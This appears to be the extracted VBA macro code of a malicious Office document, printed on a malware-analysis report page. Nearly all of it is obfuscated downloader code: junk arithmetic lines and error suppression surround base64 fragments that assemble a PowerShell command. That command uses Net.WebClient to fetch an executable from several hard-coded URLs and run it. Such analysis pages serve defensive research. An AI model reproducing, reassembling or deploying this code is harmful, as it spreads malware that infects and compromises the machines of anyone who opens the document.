iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A"
FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc
End Function
Function PFDVqbAoP()
On Error Resume Next
VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp)
JSUao = 66889
zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB"
AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw)
QinsC = 32876
OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9"
lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK)
Cdsjp = 66608
WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA"
jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu)
iKwHf = 55985
QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH"
tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW)
UObPt = 41972
VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs"
hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn)
wzClDY = 68863
otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIAfQB7" + "ADcANgB9A" + "HsAMgB9"
URBbCh = DkZzmr - Cos(dOqwo) * 1 - Chr(89635) / 11834 - ChrB(bdfwh)
RAsww = 46464
QOwDIlGqz = "AHsAOQAyAH" + "0AewA5AH" + "0AewAwAH0AewAyA" + "DcAfQB" + "7ADQAOAB9AHsAN"
PFDVqbAoP = zEcKw + OVJakqMv + WsAfvzP + QRBpdz + VJrFBkt + otWfPXMzZj + QOwDIlGqz
End Function
Function ZbKinzvB()
On Error Resume Next
UdEQMH = kaWBk - Cos(VovGk) * 1 - Chr(79227) / 86794 - ChrB(qYwFA)
mjjwn = 36989
RtmlSRApm = "QAzAH0AewA2" + "AH0AewAx" + "ADUAfQB7ADgAMQB" + "9AHsAMwB9AHsA" + "NAA2AH0Aew"
Ikmjcn = jAGiMK - Cos(dFmOJ) * 1 - Chr(59669) / 59208 - ChrB(FIKLoc)
uYNQf = 25324
aqCjlKzur = "A1ADAAfQB7" + "ADUANgB9AHsAMwA" + "yAH0AewA5" + "ADUAfQB7ADkA" + "OQB9AHsANwA"
IaIBC = qRRtp - Cos(Jiuki) * 1 - Chr(77319) / 24622 - ChrB(fiVQwN)
FiQvfp = 48693
FsYAi = "1AH0AewAxADc" + "AfQB7A" + "DgANw" + "B9AHsANAAzAH0Ae" + "wA2ADgAfQ" + "B7ADgAMwB9AHsAM"
LFHcIo = qRWYTW - Cos(ojcSj) * 1 - Chr(47330) / 59158 - ChrB(sDoqk)
BzKakh = 66493
BkzFRWSo = "QAxADEAfQB7ADE" + "AMAA1A" + "H0AewA0ADcAfQB7" + "ADIAMAB9AHsANgA" + "zAH0AewAz" + "ADcAf" + "QB7ADEAMQAwA" + "H0AewA5AD"
ZbKinzvB = RtmlSRApm + aqCjlKzur + FsYAi + BkzFRWSo
End Function
Function HpRniEwwPQ()
On Error Resume Next
WLEprn = uZuJF - Cos(hTNGAR) * 1 - Chr(13817) / 25121 - ChrB(nRDEp)
LwjoR = 18211
zwijZsALHB = "AAfQB7ADI" + "AMgB9AHsANQA5AH" + "0AewA5ADEAf" + "QB7ADE" + "AMwB9A"
QNthq = wduhf - Cos(TdzUjQ) * 1 - Chr(52682) / 33909 - ChrB(Xmmmw)
ibLUnk = 39343
tzOPrKEjbf = "HsAMw" + "A4AH0AewA5" + "ADQAfQB7AD" + "MAMQB9ACIA" + "LQBmACc" + "AZQBlAEw"
zMTaH = btkXP - Cos(qOdzY) * 1 - Chr(81645) / 84301 - ChrB(tbGusP)
BjMsE = 98599
bDPPMMUuzJ = "AWgAnAC" + "wAJwBaAGUAJwAsA" + "CcAIAAnACwAJwBF" + "AEQAJwA" + "sACcAdABlAG0" + "ALgBO"
wHQpUC = iCOXdt - Cos(wLwws) * 1 - Chr(49038) / 17634 - ChrB(GYirw)
KYiKWO = 31129
vpwiQVBODzA = "AGUAdA" + "AuAFcAZQBiA" + "EMAJwAsACcAW" + "gAzACcALAAnA" + "HQAcgB5AHsA" + "JwAsACcAUwB5AH" + "MAJwAsACc" + "ALgBj"
jiWoE = ZrXOV - Cos(CXPvMZ) * 1 - Chr(35586) / 50757 - ChrB(sGcEQ)
djNHf = 7085
cFYQTFmRwvr = "AG8AbQAv" + "AHcAJwAsACc" + "AWgAnA" + "CwAJw"
cNaDVu = OATVCX - Cos(Iiwwwp) * 1 - Chr(39094) / 83361 - ChrB(tknuvI)
Hqsav = 3679
vvofZw = "BLAEsAL" + "wBAAGgAdA" + "B0AHAAOgAv" + "AC8AaABhAG4A" + "bgBpAGcAYQB" + "uACcALAAn" + "AEwAWgBlACk" + "AOwB0ACcALAAnA" + "GMAIAArACAATA"
IEXbn = nHBtiV - Cos(OKjNI) * 1 - Chr(70620) / 73189 - ChrB(ThADGq)
iJzqG = 26020
sOuZZXDOOJ = "BaAGUASw" + "BRADQATABaA" + "GUAJwA" + "sACcAYQ" + "BTAEQAQwApA"
rYOjAo = iuLaHv - Cos(HiRLPo) * 1 - Chr(79062) / 44904 - ChrB(YhBbc)
wsOnYS = 21072
YsPkHisAqb = "DsAYgByACcALAA" + "nAGEAZABhAHM" + "AZAAnA" + "CwAJwB0ADcAYQBZ" + "ACcALAAnAEwAJwA"
bkzvkm = dwuOXf - Cos(fqZAUA) * 1 - Chr(79898) / 99298 - ChrB(NJqwTL)
Wiwiq = 50838
HLUaElN = "sACcAYQBzAGYAYw" + "AuAG0AN" + "QBFAFQAbwBTAHQA" + "cgBpAHQA" + "SwBpAGkAdA" + "AnACwAJwBaAGUAd"
sEkiv = GMFMRM - Cos(OYwKK) * 1 - Chr(53284) / 72432 - ChrB(mtoVRf)
kaAoE = 46482
YjMtt = "wAtACcALAAnA" + "FoAZQAnACwAJwB" + "uACcAL" + "AAnAG0A" + "JwAsAC" + "cAWgBlAGsATAA"
HpRniEwwPQ = zwijZsALHB + tzOPrKEjbf + bDPPMMUuzJ + vpwiQVBODzA + cFYQTFmRwvr + vvofZw + sOuZZXDOOJ + YsPkHisAqb + HLUaElN + YjMtt
End Function
Function cfrQGXvQp()
On Error Resume Next
wjSuRs = DihGn - Cos(wjmUO) * 1 - Chr(78406) / 66993 - ChrB(LwNdD)
ciMcIz = 65063
BndjHQrtnE = "nACwAJwByA" + "EUAYgBjAC" + "8AJwAsACc" + "AKwBMACc" + "ALAAnAFoAZQArA" + "EwAWgBlACcALAA" + "nADcAJwAsAC" + "cAZQApADs"
OsQKti = PHOiZZ - Cos(ojZPp) * 1 - Chr(49279) / 70736 - ChrB(EQOJZZ)
EwnXW = 33846
tqqDulzT = "AJwAsACcAZ" + "AB2AC0AcwB5A" + "HMAJwAsACcAWgB" + "lAGUAJw" + "AsACcAZABvAG0" + "AOwB0ADcAYQBZAC" + "cALAAnAH0AJ"
EEvAYw = wwdJXq - Cos(DsKIra) * 1 - Chr(75891) / 98665 - ChrB(jJJwCQ)
CCmubV = 39105
cLkPElNB = "wAsACcAbAA" + "nACwAJwAgAD0AIA" + "AnACwAJwBUAC8AQ" + "ABoAHQAdABwAD" + "oALwAvAGcAZQBu"
BowFSl = BimBG - Cos(PfqGFI) * 1 - Chr(23782) / 82691 - ChrB(zmiHb)
lwEhX = 41571
OvAFdBmp = "AGUAJwAsA" + "CcAdAA3AGEAJ" + "wAsACcA" + "MQAnACwAJwBaAC" + "cALAAnA" + "GUAYQ" + "BrACcALAAnAHQAO" + "wB0ADcAJwAsA" + "CcAQABoAHQAdABw"
CchhL = IaKBJO - Cos(WvnWMH) * 1 - Chr(96088) / 74483 - ChrB(MXKJsP)
iTiHId = 27483
jdFZmwwWSo = "ACcALAAnAD" + "AAMAAwADA" + "ALAAnACwAJwB" + "0AGUAJwAsACc" + "ALAAgACcAL" + "AAnAHQ" + "ANwBhAG4AcwB"
Xzdin = lYsokp - Cos(hVPXU) * 1 - Chr(26180) / 31222 - ChrB(WBqsn)
hbHdth = 27626
vfcpC = "hAGQAYQBzAGQA" + "IAAnACw" + "AJwBsAGkAZQAnAC" + "wAJwBvAGkAdABL" + "AFcAJwAsAC" + "cATABaAGUAS" + "QAnACwAJw" + "BmAG8Ac" + "gBlAGEAYw"
PiPwza = RVHaiA - Cos(SjoPwO) * 1 - Chr(2201) / 92116 - ChrB(qzMDwl)
rHujF = 71542
rPbuDpIwhY = "BoACgAJwAsAC" + "cALQBrAG8AZ" + "QBuAGkAZwAu" + "AGQAZQAvA" + "EMAJwA" + "sACcAbgBsAGkAd" + "ABLAE8" + "AJwAsACcA" + "cgBhAGw"
VNpLE = iSJciJ - Cos(pijzz) * 1 - Chr(37828) / 84421 - ChrB(wmWBj)
QSkRt = 63865
cGKfzRCVMp = "AYgBpAGsA" + "ZQBzACcALAAnA" + "D0AIABM" + "AFoAZQANAAo" + "AJwAsA" + "CcAdAA3AGEAYQB"
TBIDwP = XqkVn - Cos(VNYul) * 1 - Chr(72763) / 87121 - ChrB(WaSJXV)
AZLpc = 94459
JzZzmkpwsOi = "zAGYAYwAgAGkAb" + "gAgAHQANwBhAEE" + "ARABDAFgAK" + "QB7AC" + "cALAAnA" + "CsATAB" + "aACcALAAnAF"
cfrQGXvQp = BndjHQrtnE + tqqDulzT + cLkPElNB + OvAFdBmp + jdFZmwwWSo + vfcpC + rPbuDpIwhY + cGKfzRCVMp + JzZzmkpwsOi
End Function
Function iHqXlPVuM()
On Error Resume Next
cawBD = BICBOT - Cos(CtpfHn) * 1 - Chr(83907) / 93923 - ChrB(qtYulX)
ZfLPz = 71396
DZXSia = "oAZQAuA" + "FMAcABsAGkAdAA" + "nACwAJwBhAGQAR" + "gBJAGkAdABLA" + "CcALAAnAHMALg" + "B1ACc" + "ALAAnAGUAbgBlAE"
wkhFiN = QvEjP - Cos(kfioF) * 1 - Chr(48136) / 2916 - ChrB(CcJCds)
WCDpRw = 82849
fKZjm = "wAJwAsAC" + "cAWgBlACsATAB" + "aACcALAA" + "nAG4AJwAsACcAcw"
ZiJiCZ = UNVRju - Cos(XKajMv) * 1 - Chr(14801) / 46805 - ChrB(EVwut)
rwKtk = 17330
jsjBQJLzbaC = "AvAGsAMgB" + "pAHIAOQAnA" + "CwAJwBvAGI" + "AJwAsACcA" + "dgBvAEwA" + "JwAsACcAcAA6A" + "C8ALwBpAHMAY" + "QAnACwAJ"
vqzLF = vjMLi - Cos(itOhj) * 1 - Chr(91772) / 75962 - ChrB(fFMGi)
UWXGn = 19133
YHoiKSfNna = "wBlACkAI" + "AByAGEAbg" + "AnACwA" + "JwBqAGUA" + "YwBMAFoAZQ" + "AnACwAJ" + "wBMACc" + "ALAAnA" + "HQANwBhACcALAAn" + "AG4ATAAnACwA"
ROkkAp = cWrKNW - Cos(GcQaz) * 1 - Chr(93806) / 15444 - ChrB(qdshBn)
JFYYk = 24980
jwBckbTj = "JwB3AC" + "cALAAnAG" + "0AZQA" + "uAGQAZQ" + "AvAHgA" + "TwA4AHgA" + "JwAsACcAbwBP"
iziFoY = NCsHp - Cos(uGjpN) * 1 - Chr(62015) / 83489 - ChrB(HrToL)
Mllpl = 3349
nPLUDz = "ACcALAAnAD" + "sAJwAsACc" + "AbgBzA" + "CcALAA" + "nACgAdAA3A" + "GEAJwAsACcAIAA" + "rACAAdAA3AG" + "EATgBTAEI"
iHqXlPVuM = DZXSia + fKZjm + jsjBQJLzbaC + YHoiKSfNna + jwBckbTj + nPLUDz
End Function
Function FXolR()
On Error Resume Next
zSrrIj = caAZM - Cos(iCZjLE) * 1 - Chr(41491) / 14312 - ChrB(GPRcV)
cRDWnm = 94098
NWEFZ = "AIAArAC" + "cALAAn" + "AGEAJwAsACc" + "ANQAnACw"
ozEwZu = rtblYK - Cos(CihjT) * 1 - Chr(50482) / 24587 - ChrB(ZjOVAJ)
DZnhOl = 71597
wZzSVPHsW = "AJwBZAFUAI" + "AA9ACAALgAo" + "AEwAJwAsACcAK" + "ABMAFoAZQ" + "BAACcALAAnAFkA" + "VQAuAG0ANQAnAC" + "wAJwBa" + "AGUAKw" + "AnACwAJwBT"
HvMqO = qrwlQ - Cos(ZoHSW) * 1 - Chr(52395) / 22192 - ChrB(YiEuX)
qCzqva = 32555
GKKoaVEouhG = "AEQAQwApA" + "CcALAAnAHQ" + "AcAA6AC8ALw" + "BwAGwAbwBzAHMA" + "LQBlACcALAAnAGU" + "AdAAnACwAJwB" + "aACcALAAnAEs" + "ATgBnAG0ANQBFAC"
akHjz = jpRkk - Cos(XORULn) * 1 - Chr(50175) / 24994 - ChrB(YrSTUf)
tGpqwB = 27867
GNbfjwif = "gAKQAnACwAJwAg" + "ADIAOAA" + "yADEAMwAz" + "ACkAJwA" + "sACcAaAB0AHQ" + "AJwAsACcAKwBM" + "ACcALAAn"
LndEo = RUJdWb - Cos(dfIzDo) * 1 - Chr(2615) / 86435 - ChrB(QdbvvL)
tvVAvJ = 45983
ikHht = "AGUAZQAtAE" + "kAdABlA" + "G0ATABaAGUAKQA" + "oAHQANwAnA" + "CwAJwAoAEwA" + "WgBlAC4AZQB4AEw"
VYzHX = pwDDQ - Cos(hquNNd) * 1 - Chr(43785) / 43839 - ChrB(csnGZ)
iAbpT = 15013
iuCLQf = "AWgBlAC" + "sATAA" + "nACwAJwAuAG" + "4AZQB4AHQAKAAn" + "ACwAJwA7AH" + "0AYwB" + "hAHQAYwB" + "oAHsAfQAnACwAJw" + "BlACcA" + "LAAnAGQAL"
ifptVj = iXsfkN - Cos(BInRm) * 1 - Chr(2150) / 18824 - ChrB(fLBzsH)
cNwSiM = 28366
lRTYHuIuRqw = "wBAAGgAdAAnACwA" + "JwBhAG" + "UAbgB2" + "ADoAc"
TIqvV = AHVMM - Cos(rnYjGo) * 1 - Chr(72072) / 381 - ChrB(sXnThv)
jSirml = 38552
ohmrlzHA = "AB1AGIAbABpACcA" + "LAAnACYAKA" + "BMACcALA" + "AnAG0ANQBF" + "ACcALAA" + "nAGEATgBTAEIAJ" + "wAsACcAPQ" + "AgAHQAJwA" + "sACcANwAnACwAJw" + "BMACcA"
vFonf = flfaF - Cos(pPLtaO) * 1 - Chr(88398) / 50852 - ChrB(DcoJVY)
hVuGT = 29804
ffEBKAf = "LAAnAD" + "0AIAAnACwAJwA" + "oACcALAAnAEwA" + "WgBlACsAT" + "ABaAGUALQBvAGI" + "AagBlAGMAdAB" + "MAFoA" + "ZQApACAAJwAs" + "ACcAOgAvAC8"
BAzUZM = ItbGpT - Cos(lQXrt) * 1 - Chr(46317) / 86220 - ChrB(AiKfcE)
fzVZi = 19925
EKdaqwmcFTL = "AZgAnACwAJw" + "BTAEQAQ" + "wAgACcALAA" + "nAC8A" + "JwAsA" + "CcAZQAnACw"
FXolR = NWEFZ + wZzSVPHsW + GKKoaVEouhG + GNbfjwif + ikHht + iuCLQf + lRTYHuIuRqw + ohmrlzHA + ffEBKAf + EKdaqwmcFTL
End Function
Function UOiinSm()
On Error Resume Next
dtUNwu = MDfFww - Cos(WPars) * 1 - Chr(47518) / 99668 - ChrB(Ktjhw)
bkQow = 83743
HcOEsGpR = "AJwA7ACYAJwA" + "sACcAYQA" + "nACwAJwBtAGEAaQ" + "BuAGUALgBjAG8" + "AbQAvAHMAJwAs" + "ACcATABaA" + "CcALA" + "AnAHQANwBhA"
iWfZzt = afajHE - Cos(kuiml) * 1 - Chr(87816) / 18866 - ChrB(bdRwWk)
OQAES = 85307
jXIQvwUYj = "EEARABDAFgAI" + "AAnACkAK" + "QAuAHIARQBQAEwA" + "YQBDAEUAKAAoAF" + "sAYwBIAE" + "EAcgBdAD" + "EAMAA1ACsAWw" + "BjAEgAQQBy"
uSufMt = TDZuDr - Cos(hCKzdv) * 1 - Chr(91420) / 3997 - ChrB(BXCHQ)
jDmQr = 1218
LqXjMM = "AF0AMQAxADYAKw" + "BbAGMA" + "SABBAHIAX" + "QA3ADUAKQAsA" + "FsAcwBUAFIASQ" + "BuAEcAX" + "QBbAGMASABBAHI"
sGhQD = arBSt - Cos(jOpGoz) * 1 - Chr(94478) / 85001 - ChrB(sHJlP)
XWImA = 79652
YhVwbu = "AXQA5A" + "DYAKQAuAH" + "IARQBQAE" + "wAYQBDAE" + "UAKAAnAHQAN" + "wBhACcALABb" + "AHMAVABSAEkAbg"
KEQMr = bQzFJi - Cos(vqwzTu) * 1 - Chr(16216) / 11368 - ChrB(wXfowD)
tfsnP = 7772
CdvniHV = "BHAF0AWwBj" + "AEgAQQByAF" + "0AMwA2AC" + "kALgB" + "yAEUAUABMAG" + "EAQwBFACgA" + "JwBMAFoAZ" + "QAnACwAWwBz" + "AFQAUg" + "BJAG4ARwBdAFs"
qbFJQt = CAGfNj - Cos(KTFjLK) * 1 - Chr(10696) / 85594 - ChrB(DoYvFZ)
rUrEF = 41429
SNzGBPCOVZ = "AYwBI" + "AEEAcgB" + "dADMAO" + "QApAC4" + "AcgBFAFAATABhA" + "EMARQAoACgAWw" + "BjAEgAQQByAF"
krMGv = YIlWu - Cos(MmGDtj) * 1 - Chr(96167) / 89451 - ChrB(Uswnd)
PLVcUp = 8481
TXLqn = "0AMQAwAD" + "kAKwBbAGMASABB" + "AHIAX" + "QA1ADMAKw" + "BbAGMASA" + "BBAHIAXQA2A" + "DkAKQAsA"
pzEJU = uCBBX - Cos(dkRwY) * 1 - Chr(14680) / 51977 - ChrB(PzOTS)
JzQuZt = 15222
ZBQUc = "FsAcwBUAFIAS" + "QBuAEcAXQ" + "BbAGMASAB" + "BAHIAXQAzADQAK" + "QAuAHIAR" + "QBQAEwAYQB"
RDpWd = HSrzQP - Cos(itWEN) * 1 - Chr(27502) / 83945 - ChrB(qllrj)
wlHbdF = 22621
QLppol = "DAEUA" + "KAAoAFsAYw" + "BIAEE" + "AcgBdADcANQAr" + "AFsAYwBIAEEAcg" + "BdADgAMQA"
UOiinSm = HcOEsGpR + jXIQvwUYj + LqXjMM + YhVwbu + CdvniHV + SNzGBPCOVZ + TXLqn + ZBQUc + QLppol
End Function
Function YaUjYfZzmzY()
On Error Resume Next
OJBip = zHQCC - Cos(iEupMf) * 1 - Chr(31277) / 24032 - ChrB(RDiwlK)
jVmKuK = 60725
iEDjsLi = "rAFsAYwBIAE" + "EAcgBdAD" + "UAMgApACwAWwB" + "zAFQAUg" + "BJAG4" + "ARwBdAF"
CiYmH = UiowVs - Cos(RPwpzt) * 1 - Chr(93218) / 10846 - ChrB(hDuRX)
QsnUYh = 75773
iCENnPQibnP = "sAYwBIAEEAcgBdA" + "DkAMgApACAA" + "KQAgAA=="
YaUjYfZzmzY = iEDjsLi + iCENnPQibnP
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.